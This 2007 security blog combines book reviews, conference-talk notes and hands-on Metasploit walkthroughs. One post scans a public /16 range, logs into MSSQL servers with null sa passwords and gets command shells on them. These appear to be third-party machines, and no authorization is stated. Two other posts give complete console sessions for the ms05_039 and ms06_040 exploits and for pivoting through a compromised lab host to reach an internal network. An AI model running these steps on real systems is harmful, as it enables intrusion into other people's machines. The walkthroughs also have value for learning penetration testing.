Sunday, September 30, 2007

Metasploit Toolkit Book First Thoughts



thanks to a pretty good uh-oh on the framework list I got an ecopy of the new book. I'm only thru chapter 3 which really contained nothing not already out there. some of the other chapters look a bit more promising. For example you build a voip aux module (of course MC already got his working in like 5 minutes ) then you go into some case studies. two initial gripes are 1) the warez is old, out of 5 case studies i found the software for only 2 of them. A case study is worthless if you cant do it yourself (but they dont do warFTP which is good). 2) is that the exploits are written for the 2.x branch. Anyone that keeps up with MSF knows that 2.x is dead, so it certainly takes down from the value of the book for the examples to be in 2.x it wouldn't have been to hard to port them and make the book much more current.

again, this isnt the review i'm only thru chapter 3, just some initial thoughts. when i do the review i'll probably have to tackle it from two view points. 1) from someone who doesnt know anything at all about metasploit and 2) from someone who has been using the MSF for awhile. we'll see how that goes...

-CG

Saturday, September 22, 2007

Hacking Exposed Wireless by Johnny Cache & Vincent Liu Book Review


Hacking Exposed Wireless Book Review


3 stars


Doesn't live up to the Hacking Exposed reputation


I have a ton of those red covered books on the book shelf. The Hacking Exposed series has been good to me and good to every person trying to learn security. So, I was excited to have my new green covered Hacking Exposed Wireless book show up at the house so I could learn some wireless hacking. The first 60 pages or so of background technical content is interesting but not totally necessary to get going with the topic. I do realize to be a good "hacker" you need to understand the technology, but the other HE's have been able to balance giving us the background and still able to use the tools for some hacking action.


I felt that once we finally got into the technical content (starts with 802.11 discovery) that they talked around topics but really didn't cover how to actually "do" anything. There isn't much to running kismet after configuring the one or two lines of the conf file. Then its a simple #kismet or $sudo kismet and it runs. Netstumbler is even easier since you have GUI to help you out and its on Windows and same same with KisMAC on OS X.


The cracking WEP section starts out with saying use an old kernel and the madwifi-old drivers. That may have been great advice when the book was published but it is certainly not useful for the average user today especially since it appears the bugs have been worked out of the new madwifi driver and aircrack-ng. (We do have to take into account that I read the book in Sep 07 and it was published in March 07). The section on using aircrack to break WEP on linux on pages 180-182 was decent but certainly not anything you cant get on the aircrack-ng homepage. A little more content on how we do fake authentication attempts and then why and how we have aireplay send our ARP packets would have been nice. The current version of aireplay when you run that capture makes you pick which capture we want to use, since they don't cover what packet to use it may be difficult for the person following along. The shell of the instructions are there, but the details are missing.

The opportunity to shine by talking about the Fragmentation and ChopChop attacks is devoid of actually using aircrack-ng or other tools to launch the attacks, so it falls short.


The Hacking Hotspots section (CH 9) looked to be the redeeming section at first glance but much like the WEP cracking section is lacking any useful screenshots or how to use any of the tools they mention. The most frustrating part was the author telling us how they have a slick SSH set up to use public hotspots but provides no information on how to set up one of our own. The tunneling using ozymanDNS attack gives no useful information on how to use the tool, the billing attacks section gives no useful information either. While I understand its illegal to steal wifi, if you aren't going to actually cover it, don't bother talking all around it. The client attack section consisted of installing nmap and nessus and running it against clients on the LAN. That section was the perfect set up to really cover KARMA in-depth, sadly a missed opportunity.


The bluetooth section (CH 10) that looks to be written by Kevin Finisterre was excellent and met the high standards previous HE books set. He walks us through a fictional scenario with real code and explains how we can use the code to exploit bluetooth vulnerabilities on OSX and gives us the link to the code :-)


Overall I was disappointed in the book which is unfortunate because the authors are known to be very knowledgeable and skilled people in the security industry. It can be a good reference on wifi background and hardware if you need one but it falls a bit short IMO of being as useful as some of the other HE titles.

Friday, September 21, 2007

Security Metrics: Replacing Fear, Uncertainty, and Doubt by Andrew Jaquith Book Review


Security Metrics: Replacing Fear, Uncertainty, and Doubt by Andrew Jaquith


5 Stars


Every Security Professional (or wannabe) should read this book


I'm not sure what I can write to sway you to buy or read the book if 5 star reviews from Ben Rothke and Richard Bejtlich don't sway you but I'll throw my likes and dislikes in here anyway. I'm not a "metrics guy" in fact, I'm still not , but I do think the book puts the concept of using them into perspective for the person that may not use any metrics in their security work.


I've been summing up the book to people at work by using the example (and I'll badly paraphrase) from the book of "if your spam gateway blocks 100,000 spam messages a day is that a good metric?" Initially you may say yes, that is a good metric. In fact most people at work said the same thing. But, as the author explains it is a poor metric. Better metrics are useful percentages like the percentage of missed spam or the percentage of false positives. Saying that 100,000 spam message are being stopped only tells us that you have a ton of spam on your network.


Some of the things I liked about the book were the author's discussions on how to make charts more readable and efficient at portraying information. I had to read the Tufte books in college and have to admit that I got more out of chapter 6 (visualization) than I feel I learned that whole semester of class. Chapter 2 discussing what makes good metrics was extremely useful, as well were chapters 3 & 4 because they gave good examples of metrics you can use to measure an organizations various defenses like perimeter security or application security. The discussion of using COBIT, ITIL and Security Frameworks in Chapter 4 was also good.


I only had two minor gripes. First was that toward the end of the book the author talks about colors of slides and charts which obviously doesn't do us any good since the book is in black and white and second, that he does use some big words throughout the book and I did find myself having to go back and reread things. Could he have put it into simpler terms, probably, but that doesn't make the book bad, just means I need to work on my vocab :-)


Overall it was a good entrance to the world of security metrics for me and took and away some of the perceived boredom of them. It definitely gave me some tools to look more critically at the numbers and stats that some of the vendors throw our way as well as how to deliver data and information in a more useful matter.

Thursday, September 20, 2007

ChicagoCon Metasploit Talk Day2

ChicagoCon Day2 went well, talked about some post-exploitation stuff with meterpreter and was followed by a badass talk by Tom Liston (Intelguardians) about malware analysis.

Day2 is here:
http://www.carnal0wnage.com/chicon-metasploit-day2-pres.pdf

I'll hopefully get the hack videos up on LSO today, if not, this weekend.

-CG

Wednesday, September 19, 2007

ChicagoCon Metasploit Talk Day1

Looks like ChicagoCon is going well. Did a little mini review from last nite and this morning's keynote over on EH.net (link to post)

gave my Day1 talk on Metasploit Basics and everything went pretty well.

Day1 slides can be found here: http://www.carnal0wnage.com/chicon-metasploit-day1-pres.pdf

Should get Day2 up tomorrow (speaking tonight) and the backup hack videos for the demos up on LSO and EH.net shortly

-CG

Sunday, September 9, 2007

old school 0wning MSSQL --fun from the field

rule #1 dont expose your database to the world

rule #2 dont have a null sa account, especially if you are violating rule #1...

let's see...

use unicornscan to search for open TCP port 1433

cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p

Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108

run those hosts that respond through the msf auxillary module mssql_ping to see if we can get any version information. I'll omit the ones that didnt respond.


cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 4419

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

Now, lets run them thru mssql_login to look for any that have null sa accounts.

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 4749

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a null SA account.

msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed

then lets use sqlcmd to see if we can get a command shell on the box. sqlcmd uses the xp_cmdshell to execute commands.

cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuratio de IP do Windows


Adaptador Ethernet Conexto local:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador Ethernet Conexto de rede sem fio:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador PPP POP:
Sufixo DNS especsfico de conexto. :
Endereo IP . . . . . . . . . . . . : A.B.X.28
Mascara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padro. . . . . . . . . . . : A.B.X.28

OR

cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configurato de IP do Windows


Adaptador Ethernet Local:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.5
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . :

Adaptador Ethernet remoto:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.6
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . : 192.168.2.1

TFTP was available on both boxes for some some old school YR 2000 tftp upload your tools fun.

Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions

sqlcmd.c: http://excluded.wgv.at/codedstuff.php

metasploit (like you need the link): http://framework.metasploit.com/

-CG

Thursday, September 6, 2007

Using Metasploit to pivot through a exploited host part 2

ok, got it figured out (yes Dean told me to change the port yesterday). if you were following along and just want the quick answer, its that you have to change the default port number (which is 4444) to something else for that 2nd shell. 4444 is tied up on your pivot host with your meterpreter session, so that makes sense....

let see it:

get your shell, see the internal network, add the route thru your meterpreter session, no change from yesterday :-)

cg@segfault:~/evil/msf3$ ./msfconsole

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


=[ msf v3.1-dev
+ -- --=[ 217 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use exploit/windows/smb/ms05_039_pnp
msf exploit(ms05_039_pnp) > set RHOST 192.168.170.129
RHOST => 192.168.170.129
msf exploit(ms05_039_pnp) > set TARGET 6
TARGET => 6
msf exploit(ms05_039_pnp) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms05_039_pnp) > exploit
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.170.129[\ntsvcs] ...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.170.129[\ntsvcs] ...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[+] Server did not respond, this is expected
[*] Meterpreter session 1 opened (192.168.170.1:56048 -> 192.168.170.129:4444)

meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 172.16.0.1
127.0.0.0 255.0.0.0 127.0.0.1
172.16.0.0 255.255.0.0 172.16.0.1
172.16.0.1 255.255.255.255 127.0.0.1
172.16.255.255 255.255.255.255 172.16.0.1
192.168.170.0 255.255.255.0 192.168.170.129
192.168.170.129 255.255.255.255 127.0.0.1
192.168.170.255 255.255.255.255 192.168.170.129
224.0.0.0 240.0.0.0 172.16.0.1
224.0.0.0 240.0.0.0 192.168.170.129
255.255.255.255 255.255.255.255 172.16.0.1
255.255.255.255 255.255.255.255 192.168.170.129

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:c4
IP Address : 172.16.0.1
Netmask : 255.255.0.0



AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:ba
IP Address : 192.168.170.129
Netmask : 255.255.255.0


meterpreter >
Background session 1? [y/N]
msf exploit(ms05_039_pnp) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.170.1:56048 -> 192.168.170.129:4444

msf exploit(ms05_039_pnp) > route add 172.16.0.0 255.255.0.0 1
msf exploit(ms05_039_pnp) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
172.16.0.0 255.255.0.0 Session 1

The 2nd host is just a copy of the first host, so i am going to use the same exploit twice, but the key part is to change the port number for your 2nd shell.


msf exploit(ms05_039_pnp) > set RHOST 172.16.0.150
RHOST => 172.16.0.150
msf exploit(ms05_039_pnp) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms05_039_pnp) >
set LPORT 8899
LPORT => 8899
msf exploit(ms05_039_pnp) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.0.150 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE browser yes The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)


Payload options:

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 8899 yes The local port


Exploit target:

Id Name
-- ----
6 Windows XP SP1 English

msf exploit(ms05_039_pnp) > exploit
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:172.16.0.150[\ntsvcs] ...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:172.16.0.150[\ntsvcs] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.0.150
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.161.0.1

C:\WINDOWS\system32>
Background session 2? [y/N] y
msf exploit(ms05_039_pnp) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.170.1:56048 -> 192.168.170.129:4444
2 Command shell Local Pipe -> Remote Pipe

msf exploit(ms05_039_pnp) >



Screenshots

the first host, you can see the meterpreter session (port 4444) back to my host 192.168.170.1 and the connection to the internal host 172.16.0.150 on port 8899



2nd host where you can see the connection from host 1 172.16.0.1

Using Metasploit to pivot through a exploited host

so I'm working on chicagon slides and looking for a fun demo, Dean and I were talking about being able to pivot or relay through the victim into the internal network. i said i didnt think you could do it (he said you can)...the answer... you can. yeah i lost the bet :-)

http://www.metasploit.com/archive/framework/msg02580.html


so lets see it...

bust your shell and get your meterpreter session:

cg@segfault:~/evil/msf3$ ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #


=[ msf v3.1-dev
+ -- --=[ 217 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.170.129
RHOST => 192.168.170.129
msf exploit(ms06_040_netapi) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_040_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.170.129[\SRVSVC] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.170.129[\SRVSVC] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.170.1:44656 -> 192.168.170.129:4444)


run the route command to see what networks the victim can hit, you can also run ipconfig to see if the box is dual nic'ed

meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 172.16.0.1
127.0.0.0 255.0.0.0 127.0.0.1
172.16.0.0 255.255.0.0 172.16.0.1
172.16.0.1 255.255.255.255 127.0.0.1
172.16.255.255 255.255.255.255 172.16.0.1
192.168.170.0 255.255.255.0 192.168.170.129
192.168.170.129 255.255.255.255 127.0.0.1
192.168.170.255 255.255.255.255 192.168.170.129
224.0.0.0 240.0.0.0 172.16.0.1
224.0.0.0 240.0.0.0 192.168.170.129
255.255.255.255 255.255.255.255 172.16.0.1
255.255.255.255 255.255.255.255 192.168.170.129

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0


AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:c4
IP Address : 172.16.0.1
Netmask : 255.255.0.0


AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:ba
IP Address : 192.168.170.129
Netmask : 255.255.255.0



OR the handy dandy script that comes with msf get_local_subnets

meterpreter > run get_local_subnets
Local subnet: 0.0.0.0/0.0.0.0
Local subnet: 172.16.0.0/255.255.0.0
Local subnet: 192.168.170.0/255.255.255.0



as you can see there is an internal network

the post by hdm says to ctrl+z out of your meterpreter session to background it then set up a route in the msfconsole session

meterpreter > **did a ctrl+z here
Background session 1? [y/N] y
msf exploit(ms06_040_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local.

msf exploit(ms06_040_netapi) > route print

msf exploit(ms06_040_netapi) > route add 172.16.0.0 255.255.0.0 1

msf exploit(ms06_040_netapi) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
172.16.0.0 255.255.0.0 Session 1

msf exploit(ms06_040_netapi) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.170.1:44656 -> 192.168.170.129:4444


ok so you can see that we should be routing traffic thru there. now i tried to ping the host (which is 172.16.0.100) in this case and that didnt work, i also couldnt get any of the scanner auxiliary modules to actually scan and find anything (on either network) which is a bummer.

but i did get the smb scanner auxillary module to work and give me back the correct answer, so i know its working and passing data.

msf exploit(ms06_040_netapi) > back
msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 172.16.0.100
RHOSTS => 172.16.0.100
msf auxiliary(version) > run
[*] 172.16.0.100 is running Windows 2000 Service Pack 0 - Service Pack 4
[*] Auxiliary module execution completed


i'm still playing with popping a shell on the internal net, thus far msf says its working but when it comes time to interact with the shell its just not happening

msf > use exploit/windows/http/badblue_ext_overflow
msf exploit(badblue_ext_overflow) > set RHOST 172.16.0.100
RHOST => 172.16.0.100
msf exploit(badblue_ext_overflow) > set RPORT 8080
RPORT => 8080
msf exploit(badblue_ext_overflow) > show targets

Exploit targets:

Id Name
-- ----
0 BadBlue 2.5 (Universal)

msf exploit(badblue_ext_overflow) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(badblue_ext_overflow) > exploit -z
[*] Started bind handler
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)
[*] Trying target BadBlue 2.5 (Universal)...
[*] Session 2 created in the background.

msf exploit(badblue_ext_overflow) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.170.1:45544 -> 192.168.170.129:4444
2 Command shell Local Pipe -> Remote Pipe

msf exploit(badblue_ext_overflow) > sessions -i 2
[*] Starting interaction with 2...



**and thats about all i get, tried it with a few different sploits same result :-(

the useradd payload does work though



if anyone has been here, let me know if there is a nifty little trick to make it happen.

-CG

Monday, September 3, 2007

Lack of updates, but with an excuse

So I apologize to my handful of readers for a lack of an update this week. I've been in Northern VA doing some interviewing for jobs.

I thought I would have some wicked fun blog posts on the tech questions I got asked, but I really didn't field too many. most of those were on the phone or maybe my background just spoke that I could learn anything I needed to learn. Either way, I'll hold off on blog posts about the interviews until I actually get any job offers.

But for fun, check out phn1x's blog over at:

http://www.hamsterswheel.com/techblog/

He is doing some cool research on sebek and detecting when you are in a virtual machine ala redpill. so check it out while I get caught back up.